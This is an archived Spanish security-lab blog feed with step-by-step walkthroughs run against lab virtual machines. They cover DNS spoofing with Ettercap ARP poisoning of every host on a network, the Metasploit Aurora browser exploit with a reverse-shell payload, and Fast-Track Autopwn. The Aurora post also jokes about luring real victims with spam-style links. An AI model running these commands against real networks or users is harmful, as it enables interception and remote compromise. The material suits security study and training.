tag:blogger.com,1999:blog-25684725770138258292024-03-04T21:07:00.805-08:00My Hack LabsPoniendo a prueba la seguridad en la redCapdehttp://www.blogger.com/profile/09552232527412248401noreply@blogger.comBlogger5125tag:blogger.com,1999:blog-2568472577013825829.post-28994280522732159662011-12-22T11:00:00.000-08:002011-12-22T11:01:30.479-08:00[Others] JavaApplet<div>Conceptos básicos:</div><div><br />
</div><div><ul><li><b>Applet </b>: Componente de una aplicación que se ejecuta en el contexto de otro programa, por ejemplo un navegador web.<br />
<br />
</li>
<li><b>Applet de Java </b>: Es un Applet escrito en Java. Los applets de Java pueden ejecutarse en un navegador web utilizando la Maquina virtual de java (JVM).<br />
<br />
<u>Según la wikipedia:</u><br />
<br />
...entre sus características podemos mencionar un esquema de seguridad que permite que los applets que se ejecutan en el equipo no tengan acceso a partes sensibles (por ej. no pueden escribir archivos)....<br />
<br />
<span style="color: red;">... a menos que uno mismo le dé los permisos necesarios en el sistema...</span></li>
</ul><div>Si amigos ... cuantas veces le hemos dado al OK sin leer o simplemente nos hemos pasado por el forro las advertencias, pues este video se lo dedico a todas aquellas <i>"Anitas las secretarias*" </i>que hay por el mundo.</div><div><span style="color: red;"><br />
</span></div><iframe allowfullscreen="" frameborder="0" height="315" src="http://www.youtube.com/embed/r4AZZml7GNA" width="560"></iframe><br />
<div><span style="color: red;"><br />
</span></div><div><span style="color: red;">*persona lo abre y lo ejecuta todo aunque desconozca la procedencia </span></div><div><span style="color: red;"><br />
</span></div><div><i><u>Material necesario para realizar este laboratorio</u></i>:</div><div><ul><li>Maquina virtual: Windows XP SP3 (Maquina virtual de java instalada)</li>
<li>El Applet de Java ( lo podéis encontrar por la web o me lo podéis pedir ) </li>
<li>Un ejecutable ( vosotros mismos... )</li>
</ul></div></div><div><br />
</div>Capdehttp://www.blogger.com/profile/09552232527412248401noreply@blogger.com0tag:blogger.com,1999:blog-2568472577013825829.post-11692116571515159372011-03-01T04:10:00.000-08:002011-12-22T10:11:59.527-08:00Mundo Hacker TVFinalmente los amigos de Mundo Hacker dan el salto de la radio a la TV, a continuacion os dejo los tres primeros capitulos en los que podremos ver a Antonio, Jean Pol, Ruben,Yago y compañia en acción!<br />
<br />
<a href="http://www.globbtv.com/566/videos/Mundo-Hacker-TV---Ep.1">Episodio 1</a><br />
<a href="http://www.globbtv.com/716/videos/mundo-hacker-tv---ep2">Episodio 2</a><br />
<a href="http://www.globbtv.com/986/videos/mundo-hacker-tv-ep3">Episodio 3</a><br />
<a href="http://www.globbtv.com/1105/videos/mundo-hacker-tv-ep-4">Episodio 4</a><br />
<a href="http://www.globbtv.com/1263/videos/Mundo-Hacker-TV-EP-5">Episodio 5</a><br />
<a href="http://www.globbtv.com/1354/videos/MUNDO-HACKER-TV-EP-6">Episodio 6</a><br />
<a href="http://www.globbtv.com/mundohackertv/108/programa/1411/mundo-hacker-tv-especial-agosto-ep-7/0">Episodio 7</a><br />
<a href="http://www.globbtv.com/mundohackertv/108/programa/1430/mundo-hacker-tv-ep8---seguridad-y-hacking-web/0">Episodio 8</a><br />
<a href="http://www.globbtv.com/mundohackertv/108/programa/1488/mundo-hacker-ep9---recuperacion-de-datos-ante-desastres/0">Episodio 9</a><br />
<a href="http://www.globbtv.com/mundohackertv/108/programa/1609/mundo-hacker-ep10---seguridad-perimetral---firewalls/0">Episodio 10</a><br />
<a href="http://www.globbtv.com/mundohackertv/108/programa/1852/capitulo-que-nunca-dejaron-emitir-en-television-inedito/0">Episodio "Fantasma"</a><br />
<br />
<br />
<br />
<div style="text-align: center;"><br />
</div>Capdehttp://www.blogger.com/profile/09552232527412248401noreply@blogger.com0tag:blogger.com,1999:blog-2568472577013825829.post-88397538768358415912011-01-31T04:03:00.000-08:002011-02-28T13:08:57.886-08:00[MiM] DNS spoofing<b>Conceptos básicos:</b><br />
<b></b><br />
<ul><li><b>DNS (</b><b>Domain Name System</b><b>): </b>Es una base de datos distribuida, con información que se usa para traducir los nombres de dominio, fáciles de recordar y usar por las personas, en números de protocolo de Internet (IP) que es la forma en la que las máquinas pueden encontrarse en Internet.</li>
<li style="border: medium none;"><b>Spoofing:</b> <div>En términos de seguridad de redes hace referencia al uso de técnicas de suplantación de identidad generalmente con usos maliciosos o de investigación.<b></b></div></li>
</ul><div style="border: medium none;"></div><div></div><div style="border: medium none;"><b>DNS Spoofing: ¿Que és? y ¿En qué consiste? </b></div><div style="border: medium none;"></div><div></div><div style="border: medium none;">Teniendo en cuenta los conceptos anteriores, una traduccion sencilla de DNS Spoofing seria: uplantación de identidad por nombre de dominio. </div><div style="border: medium none;"></div><div></div><div style="border: medium none;">Consiste en el falseamiento de una relación "Nombre de dominio-IP" ante una consulta de resolución de nombre, es decir, resolver con una dirección IP falsa un cierto nombre DNS o viceversa.</div><div style="border: medium none;">Esto se consigue falseando las entradas de la relación Nombre de dominio-IP de un servidor DNS, mediante alguna vulnerabilidad del servidor en concreto o por su confianza hacia servidores poco fiables. Las entradas falseadas de un servidor DNS son susceptibles de infectar (envenenar) el caché DNS de otro servidor diferente (DNS Poisoning).</div><div style="border: medium none;"></div><div></div><div style="border: medium none;">Para realizar este laboratorio utilitzaré Ettercap, ya que es multiplataforma y me permite realizar las pruebas tanto en Windows como en Linux</div><div style="border: medium none;"><br />
</div><div style="border: medium none; clear: both; text-align: left;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2180E601dgahF5Z-UL0f6Og4asryYMk2Hu1RqcIgaWTB5hnOGUaAEupqnootFPArAP1x29chdR893RSbylee78j2kEIYYBVQdPWq6Cs3BFiYLPiwfChez_HWsWfpa8lUgq_2-j2DufGg/s1600/ettercap.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="60" s5="true" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2180E601dgahF5Z-UL0f6Og4asryYMk2Hu1RqcIgaWTB5hnOGUaAEupqnootFPArAP1x29chdR893RSbylee78j2kEIYYBVQdPWq6Cs3BFiYLPiwfChez_HWsWfpa8lUgq_2-j2DufGg/s200/ettercap.png" width="200" /></a></div><div class="separator" style="clear: both; text-align: center;"><br />
</div><div style="border: medium none;">Podemos descargar las diferentes versiones de la suite de Etthercap desde la pagina web del proyecto <a href="http://ettercap.sourceforge.net/"><span style="color: yellow;">http://ettercap.sourceforge.net/</span></a></div></div><div style="border: medium none;"><br />
Tenia intención de hacer el ejemplo tanto en linux como en windows pero debido al "inexistente" tiempo libre del que dispongo lo realizare sobre linu (que queda más <strike>friki</strike> pro)</div><div style="border: medium none;"><br />
</div><div style="border: medium none;"></div><div>Paso a paso (Linux)<br />
<br />
<ul><li>Abrimos un shell y nos dirigimos a la ruta donde tenemos situado el pluging que utilizaremos para realizar este laboratorio, por defecto : <br />
<br style="color: lime; font-family: "Courier New",Courier,monospace;" /><span style="font-size: small;"><span style="color: lime; font-family: "Courier New",Courier,monospace;">cd /usr/share/ettercap/</span></span> </li>
</ul><ul><li> Ahora ahora editaremos el archivo etter.dns que será el archivo para configurar el plugin a nuestro gusto.<br />
<br />
<span style="font-size: small;"><span style="color: lime; font-family: "Courier New",Courier,monospace;">nano etter.dns</span></span><br />
<br />
</li>
<li>Utilizremos la siguiente estructura:<br />
<span style="font-size: small;"><br />
</span> <span style="font-size: small;"><b style="color: red;">www.site.com A IP destino<br />
<br />
site.com A IP destino<br />
<br />
*site.com A IP destino</b></span> <br />
<br />
Como se puede obserbar en la captura siguiente estoy redireccionando todas las peticiones DNS que se realizan a petardas.com a la ip de google.<br />
<i>Para saber la ip de cualquier site web, tendremos suficiente que realizar un ping a ese site.</i></li>
</ul><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXAWm3j-cww-17wLQC7IG4_HX-oqjtOlvcJLZqH1mEqBCjwqtNM6bNLBl6GHAXQ2sIJt_o5jyvh49OIq3RpbQ9vD-qrq9HRHKEQlN8zpvtEUsbva5MviPUfFVeNaeEUAfSVNXheN3VFZI/s1600/Captura+de+pantalla+2011-02-28+a+las+21.51.55.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="205" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXAWm3j-cww-17wLQC7IG4_HX-oqjtOlvcJLZqH1mEqBCjwqtNM6bNLBl6GHAXQ2sIJt_o5jyvh49OIq3RpbQ9vD-qrq9HRHKEQlN8zpvtEUsbva5MviPUfFVeNaeEUAfSVNXheN3VFZI/s320/Captura+de+pantalla+2011-02-28+a+las+21.51.55.png" width="320" /></a></div><br />
<ul><li>Bien, una vez ya tenemos editado el archivo ya solo nos queda lanzar ettercap (se puede lanzar de modo visual o en modo consola, en este caso lo lanzo en modo consola que es más <strike>friki</strike> molón.<br />
<br style="color: lime; font-family: "Courier New",Courier,monospace;" /><div style="text-align: left;"><span style="font-size: small;"><span style="color: lime; font-family: "Courier New",Courier,monospace;">ettercap -T -q -i eth0 -P dns_spoof -M arp // //</span></span></div><span style="color: lime;"><span style="font-family: "Courier New",Courier,monospace;"> </span></span> <u><b><span style="color: lime;"><span style="font-family: "Courier New",Courier,monospace;"><br />
</span></span>Parametros utilizados:</b></u><br />
<br />
<pre style="display: inline; margin-top: 0pt;"><b>-T </b> <span style="font-family: inherit;">text mode</span>
<b>-q </b> <span style="font-family: inherit;">quiet</span>
<b>-i </b> <span style="font-family: inherit;">interface (en mi caso eth0)</span>
<b>-P</b> <b>dns_spoof </b> <span style="font-family: inherit;">plugin + el nombre del plugin (dns_spoof de ettercap)</span>
<b>-M arp </b><span style="font-family: inherit;"> ManInTheMiddle ARP</span>
<b>// //</b> <span style="font-family: inherit;">Todas las maquinas de la red</span></pre></li>
</ul><br />
<br />
</div><iframe allowfullscreen="" frameborder="0" height="295" src="http://www.youtube.com/embed/XNzRp4x4K0M?fs=1" width="480"></iframe><br />
<br />
<div style="border: medium none;"></div><div></div><br />
<div></div><div class="separator" style="clear: both; text-align: justify;"><u>Material necesario para realizar este laboratorio:</u></div><ul><li>Maquina virtual: Backtrack 4 </li>
<li style="text-align: left;">Maquina virtual: Windows XP SP3</li>
</ul><div style="border: medium none;"><br />
</div>Capdehttp://www.blogger.com/profile/09552232527412248401noreply@blogger.com0tag:blogger.com,1999:blog-2568472577013825829.post-38729829132456413072010-12-02T14:56:00.000-08:002010-12-10T02:17:38.150-08:00[Metasploit] Testing Aurora<b>¿Qué es Metasploit?</b><br />
<br />
Un proyecto open source, dedicado al estudio de la seguridad informática que proporciona información acerca de vulnerabilidades en diferentes sistemas de información y ayuda en tests de penetración y en el desarrollo de firmas para sistemas de detección de intrusos.<br />
<br />
Básicamente es una enorme base de datos, con la mayoría de exploits conocidos hasta la fecha, que permite "cargarlos y dispararlos"<br />
<br />
<u>Conceptos básicos:</u> <br />
<br />
<ul><li><b>Exploit</b>: Fragmento de código encargado de explotar una vulnerabilidad</li>
<li><b>Payload</b>: Carga del código.</li>
</ul><i>En un símil armamentístico el exploit sería la pistola y el payload la munición. </i><br />
<br />
<b>¿Qué es Aurora? </b><br />
<br />
Hace un mes, se llevo a cabo un ataque a Google, Adobe y otras grandes compañias del sector en el cual se obtuvo información valiosa de sus clientes, este ataque llamado “Operación Aurora” vulnera una bug del Internet Explorer en todas sus versiones. Aunque a día de hoy este bug ya ha sido parcheado por Microsoft, siguen siendo muchas las compañias y hogares que siguen sin tener actualizado su navegador ya sea por pereza, una mala gestión del administrador o por simple ignorancia. <br />
<br />
<br />
Paso a Paso:<br />
<br />
<ul><li>Encendemos las dos maquinas virtuales. </li>
<li>Sobre la maquina virtual de Backtrack nos dirigimos a través del menú del Backtrack (Backtrack > Penetration >Metasploit Exploitation Framework> Framework version 3> Msfconsole) o bien ejecutamos los siguientes comandos:<span style="font-size: small;"><br />
<br />
<span style="color: lime; font-family: "Courier New",Courier,monospace;">root@bt:~# cd /pentest/exploits/framework3</span></span><span style="font-size: small;"><span style="color: lime; font-family: "Courier New",Courier,monospace;"><br />
root@bt:/pentest/exploits/framework3# ./msfconsole<br />
</span></span></li>
</ul><ul><li>Como <i>Best Practice</i> es recomendable actualizar la Metasploit antes de utilizarlo ya de este modo estaremos "a la última" </li>
</ul><div style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiR2Kd7dgLugOE6524X2c0Z4d5rSBXWD2v68jNIjgpIAiorganv8i0qdeUh7MSjyZeoJpiVM4f-yXcysZRh09MS-qlMbN46R3sncbh1h6jezThTUt9foROCp0rPH_F77sfUWEs5p6Bkkj4/s1600/Imagen+1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="239" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiR2Kd7dgLugOE6524X2c0Z4d5rSBXWD2v68jNIjgpIAiorganv8i0qdeUh7MSjyZeoJpiVM4f-yXcysZRh09MS-qlMbN46R3sncbh1h6jezThTUt9foROCp0rPH_F77sfUWEs5p6Bkkj4/s320/Imagen+1.png" width="320" /></a></div><br />
<br />
<ul><li>Empezaremos buscando nuestro exploit, para ello introducieremos el siguiente comando en la consola de Metasploit:<br />
<br />
<span style="color: lime; font-family: "Courier New",Courier,monospace;">msf > search Aurora</span><br />
<br />
</li>
<li>Una vez encontrado nuestro exploit lo cargamos con el siguiente comando:<br />
<br style="color: lime; font-family: "Courier New",Courier,monospace;" /><span style="color: lime; font-family: "Courier New",Courier,monospace;">msf > use windows/browser/ms10_002_aurora</span><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinFZR53ZNIofVMETkyXOWmTlpAyoPnV4UgkJhZW1iBrBDJY8j1lAs2iIfpOfaqZjDvtGl9u7zquuhrdDAAxMu4TzhCluqAsqAeh9WH42q1bJ7zyfUG17G-3cK92qmy1DCN5fNEgA3fAeA/s1600/Imagen+2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="238" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinFZR53ZNIofVMETkyXOWmTlpAyoPnV4UgkJhZW1iBrBDJY8j1lAs2iIfpOfaqZjDvtGl9u7zquuhrdDAAxMu4TzhCluqAsqAeh9WH42q1bJ7zyfUG17G-3cK92qmy1DCN5fNEgA3fAeA/s320/Imagen+2.png" width="320" /><br />
</a></div> </li>
<li> Bien ahora que ya tenemos cargado el exploit nos hace falta un Payload, como de Payloads hay un "porron y medio", yo suelo cojer siempre los mismos, un meterpreter o una shell reversa. En este caso cojere la shell reversa que el meterpreter ya se vio por encima con el Autopawn de Fastrack.<br />
Para cargar el Payload que nos devuelva una shell reversa introducimos el siguiente comando en la consola:<br />
<br />
<span style="color: lime; font-family: "Courier New",Courier,monospace;">msf exploit(ms10_002_aurora)> set PAYLOAD windows/shell/reverse_tcp</span><br />
<span style="color: black; font-family: Times,"Times New Roman",serif;"> </span><span style="color: lime; font-family: "Courier New",Courier,monospace;"><span style="color: black; font-family: Times,"Times New Roman",serif;"><span style="color: white;"></span></span></span></li>
<li><span style="color: black; font-family: Times,"Times New Roman",serif;"></span>Una vez cargada la "polvora" solo nos queda configurarlo, para ello introduciremos por consola:<br />
<br />
<span style="color: lime; font-family: "Courier New",Courier,monospace;">Show options</span><br />
<br />
Quenos nomstrará las opciones y parametros a configurar de nuestro ataque.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibAQTvEngIMeTYhbb2nj2w22mgmf6-mb1ljMuAHStyqTzOUE3orlGc09F_cBHprCB0DPTSzR_wnBZh0DjphcxX0X2UNq7kCYBvMS5T_jIa_KGlU4BMWDRgMv4vN6SVl_AbCP3VQdeWnsk/s1600/Imagen+5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="140" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibAQTvEngIMeTYhbb2nj2w22mgmf6-mb1ljMuAHStyqTzOUE3orlGc09F_cBHprCB0DPTSzR_wnBZh0DjphcxX0X2UNq7kCYBvMS5T_jIa_KGlU4BMWDRgMv4vN6SVl_AbCP3VQdeWnsk/s200/Imagen+5.png" width="200" /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmX50qwwJZTmeIALohZy0cWPyE197C-yNBBF-Sw0uoXngHjXc9fOgnAb0gIoKFefZZx9fDoWOPePqPEsOPyFfYdKsyY4bzkNqpFpvMppGtpFE2mkVLZhM0psb80r9azHy8iVOZT2mkKR8/s1600/Imagen+6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="140" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmX50qwwJZTmeIALohZy0cWPyE197C-yNBBF-Sw0uoXngHjXc9fOgnAb0gIoKFefZZx9fDoWOPePqPEsOPyFfYdKsyY4bzkNqpFpvMppGtpFE2mkVLZhM0psb80r9azHy8iVOZT2mkKR8/s200/Imagen+6.png" width="200" /></a></div><br />
<br />
<br />
</li>
<li> Para configurar los diferentes parametros/variables lo haremos, con el comando SET de la siguiente manera:<span style="color: black; font-family: Times,"Times New Roman",serif;"><br />
<br />
<span style="color: lime;">SET</span> <span style="color: white;">[Nombre de la variable] [Valor de la variable] </span></span><span style="color: lime; font-family: "Courier New",Courier,monospace;"><span style="color: white;"> </span> <br />
<br />
<span style="color: black;"><span style="color: red; font-family: Times,"Times New Roman",serif;">Ejemplo</span><span style="color: red;">:</span><br />
<br />
<span style="color: lime;">SET LHOST 192.168.1.132</span></span></span></li>
</ul><ul><li>Ahora que ya tenemos configurado nuestro ataque solo nos falta una cosa ...... LANZARLO !!<br />
Para ello introduciremos en la consola el siguiente comando:<br />
<br />
<span style="color: lime; font-family: "Courier New",Courier,monospace;">msf exploit(ms10_002_aurora)> exploit</span></li>
</ul><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2NVAgUt0tLrwn1akHgY7yuihyphenhyphenVGxo0oroDeLHw-TgWWoonwvR6PcUDELbc49XwCPqBschUK5zTHXLNzWd0iqTfxY6fiFxaZ1I_a4TOObfotpS7m09tKCZHEVjphghM4fFN4g4Z8GJR6k/s1600/Imagen+7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="237" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2NVAgUt0tLrwn1akHgY7yuihyphenhyphenVGxo0oroDeLHw-TgWWoonwvR6PcUDELbc49XwCPqBschUK5zTHXLNzWd0iqTfxY6fiFxaZ1I_a4TOObfotpS7m09tKCZHEVjphghM4fFN4g4Z8GJR6k/s320/Imagen+7.png" width="320" /><br />
</a></div><div style="text-align: left;">Como se observa en la imagen anterior ya tenemos nuestro falso "servidor web" montado, ahora solo falta enviarle la URL a "Anita la secretaria" de turno o "Pepito el fontanero" prometiendoles viagras a mitad de precio o rusas buscando jurandoles amor eterno o simplemente haciendo un MiM.</div><div style="text-align: left;"> </div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2NVAgUt0tLrwn1akHgY7yuihyphenhyphenVGxo0oroDeLHw-TgWWoonwvR6PcUDELbc49XwCPqBschUK5zTHXLNzWd0iqTfxY6fiFxaZ1I_a4TOObfotpS7m09tKCZHEVjphghM4fFN4g4Z8GJR6k/s1600/Imagen+7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><br />
</a></div><div><iframe frameborder="0" height="295" src="http://www.youtube.com/embed/FYTpKoli4LI?fs=1" width="480"></iframe></div><div class="separator" style="clear: both; text-align: justify;"><br />
</div><div class="separator" style="clear: both; text-align: justify;"><u>Comandos imprescindibles para el uso de Metasploit</u>:</div><div class="separator" style="clear: both; text-align: justify;"><br />
</div><ul><li><b>Show:</b> Mostrar.</li>
<li><b>Search:</b> Buscar. </li>
<li><b>Show all:</b> Muestra todos los exploits, payloads, modulos auxiliares, etc .</li>
<li><b>Show Exploits:</b> Muestra el listado de Exploits.</li>
<li><b>use [Exploit]:</b> Comando para cargar el Exploit.</li>
<li><b>Set target [X]:</b> Comando para seleccionar sistema.</li>
<li><b>Show Payloads:</b> Muestra el listado de Payloads.</li>
<li><b>Set PAYLOAD:</b> Carga el Payload. </li>
<li><b>Show options:</b> Muestra el estado y las variables necesarias para realizar el "ataque".</li>
<li><b>Set RHOST:</b> Carga del host remoto.</li>
<li><b>Set RPORT:</b> Carga del puerto remoto.</li>
<li><b>Set LHOST:</b> Carga del host local.</li>
<li><b>Set LPORT:</b> Carga del puerto local.</li>
</ul><div class="separator" style="clear: both; text-align: justify;"><br />
</div><div class="separator" style="clear: both; text-align: justify;"><u>Material necesario para realizar este laboratorio:</u></div><ul><li>Maquina virtual: Backtrack 4 </li>
<li style="text-align: left;">Maquina virtual: Windows XP SP3</li>
</ul>Capdehttp://www.blogger.com/profile/09552232527412248401noreply@blogger.com0tag:blogger.com,1999:blog-2568472577013825829.post-15157340224854848002010-11-29T15:56:00.000-08:002010-12-01T02:06:59.636-08:00[Piloto] Probando Autopwn de Fast-Track<div class="separator" style="clear: both; text-align: left;">¿Qué es Fast-Track? </div><div class="separator" style="clear: both; text-align: left;"><br />
</div><div class="separator" style="clear: both; text-align: left;">Fast-Track es una herramienta diseñada para realizar tests de penetración de un modo "automagico" por decirlo de alguna manera, esta herramienta la podemos encontrar en la distribución Backtrack o bien nos la podemos descargar y ejecutar a través de un interprete de pyton (lo que convierte esta herramienta en multiplataforma)</div><div class="separator" style="clear: both; text-align: left;"><br />
</div><div class="separator" style="clear: both; text-align: left;">Paso a Paso:</div><div class="separator" style="clear: both; text-align: left;"><br />
</div><div class="separator" style="clear: both; text-align: left;"></div><ul><li>Encendemos las dos maquinas virtuales.</li>
<li>Sobre la maquina virtual de Backtrack nos dirigimos a través del menú del Backtrack (Backtrack > Penetration > FastTrack > Fast-Track Interactive) o bien ejecutamos los siguientes comandos: </li>
</ul><blockquote><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;"><span class="Apple-style-span" style="color: lime;">root@bt:~# cd /pentest/exploits/fasttrack/</span></span></blockquote><blockquote><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;"><span class="Apple-style-span" style="color: lime;">root@bt:/pentest/exploits/fasttrack# ./fast-track.py -i </span></span></blockquote><br />
<ul><li>A modo de <i>Best Practice</i> es recomendable actualizar Fast-Track al ejecutarlo, por lo que seleccionaremos la opción 1 del menú.</li>
</ul><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKd3OLw6FznSEsGzHy_IOFhaz6OJPKTlFq9RwsDVgr6ouqzhcZR2PCH6-qdPt50eq5s2QB5XylXEsnZcwf6PzVx1I0ae80kuwpiHBGfoOiORE0PHRvWeHivAfya3uDf6latLNNOLpsdrs/s1600/CAPMEN.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="238" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKd3OLw6FznSEsGzHy_IOFhaz6OJPKTlFq9RwsDVgr6ouqzhcZR2PCH6-qdPt50eq5s2QB5XylXEsnZcwf6PzVx1I0ae80kuwpiHBGfoOiORE0PHRvWeHivAfya3uDf6latLNNOLpsdrs/s320/CAPMEN.png" width="320" /></a></div><div><br />
</div><ul><li>Una vez actualizado, solo nos quedará seleccionar la IP de la maquina "víctima" o un rango de IPs a los que se les lanzará inicialmente un nmap, para detectar que hosts están levantados y los puertos que tienen abiertos para así poder acotar más en el momento de seleccionar los exploits a lanzar. Para esto seleccionamos la opción 2 del <i>Main Menu.</i></li>
</ul><div><i><br />
</i></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlpafJ2klsG9PoJ0xtP1gWhbU6x_lEuiRzGxFws7rmOr8zlT6ZNokZJWhiyT7HXIAq6RYdFNFmI6iPkRqPIMjGXk-SjZ-OmtajEh7HZlWD2T-kgb-InsM1k-mWyMnwlVNTCnBdRdsCJzI/s1600/CAPMEN12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="148" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlpafJ2klsG9PoJ0xtP1gWhbU6x_lEuiRzGxFws7rmOr8zlT6ZNokZJWhiyT7HXIAq6RYdFNFmI6iPkRqPIMjGXk-SjZ-OmtajEh7HZlWD2T-kgb-InsM1k-mWyMnwlVNTCnBdRdsCJzI/s200/CAPMEN12.png" width="200" /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuOIKZ-pxbLE9Co589AAwzwDvy_A7QwEVKI0uwNd9fusIYsEMNp8p8fHVnEUvvXAZv3b6iyyKFzVchoFRNBMCr03ndyZUuNDrqb6kTk0MFTzsCLAkQ8L5VGCUH33kPYZDlsLWeANBXo_A/s1600/Imagen+6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="148" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuOIKZ-pxbLE9Co589AAwzwDvy_A7QwEVKI0uwNd9fusIYsEMNp8p8fHVnEUvvXAZv3b6iyyKFzVchoFRNBMCr03ndyZUuNDrqb6kTk0MFTzsCLAkQ8L5VGCUH33kPYZDlsLWeANBXo_A/s200/Imagen+6.png" width="200" /></a></div><ul><li>Una vez seleccionada la IP o el rango de IPs, solo nos quedara seleccionar el tipo de conexión (directa o reversa)</li>
<ul><li><b>Directa (Bind):</b> La conexión la realiza la equipo "atacante" sobre el equipo "víctima"</li>
<li><b>Reversa (Reverse)</b>: La conexión se realiza de manera que la equipo "víctima" se conecta al equipo atacante</li>
</ul></ul><div class="separator" style="clear: both; text-align: left;"></div><ul><li>Ahora solo queda esperar, a ver si alguno de los sistemas de nuestra red es vulnerable, una vez se han lanzado todos los exploits sabremos si hemos conseguido penetrar en algún sistema a través del comando:</li>
</ul><blockquote><span class="Apple-style-span" style="color: lime;"><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">sessions -l </span></span></blockquote><blockquote> i </blockquote><blockquote><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;"><span class="Apple-style-span" style="color: lime;">sessions -i x </span>(donde x es el número de la sesión)</span></blockquote><blockquote> </blockquote><br />
A continuación dejo un video con una demostración de Fast-Track en pleno funcionamiento.<br />
<br />
<div class="separator" style="clear: both; text-align: justify;"><br />
</div><div class="separator" style="clear: both; text-align: justify;"><br />
</div><div class="separator" style="clear: both; text-align: center;"><iframe frameborder="0" height="295" src="http://www.youtube.com/embed/3lE-TYCy5CY?fs=1" width="480"></iframe></div><div class="separator" style="clear: both; text-align: justify;"><br />
</div><div class="separator" style="clear: both; text-align: justify;"><br />
</div><div class="separator" style="clear: both; text-align: justify;"><u>Material necesario para realizar este laboratorio:</u></div><div class="separator" style="clear: both; text-align: justify;"></div><ul><li>Maquina virtual: Backtrack 4 </li>
<li>Maquina virtual: Windows XP SP3</li>
</ul><div><br />
</div><br />
<br />
<div class="separator" style="clear: both; text-align: justify;"><br />
</div><div class="separator" style="clear: both; text-align: justify;"><br />
</div><div style="text-align: justify;"><br />
</div>Capdehttp://www.blogger.com/profile/09552232527412248401noreply@blogger.com0